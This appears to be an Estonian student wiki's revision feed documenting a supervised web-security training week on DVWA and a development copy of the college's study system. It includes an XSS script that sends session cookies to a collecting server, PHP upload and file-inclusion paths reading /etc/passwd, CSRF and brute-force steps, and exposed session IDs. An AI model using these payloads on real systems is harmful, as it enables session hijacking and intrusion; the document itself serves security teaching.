    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47045</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47045"/>
		<updated>2012-03-30T13:43:51Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Meida: &amp;quot;Insecure Cryptographic Storage.pdf&amp;quot;]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Meida: &amp;quot;Security Misconfiguration.pdf&amp;quot;]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
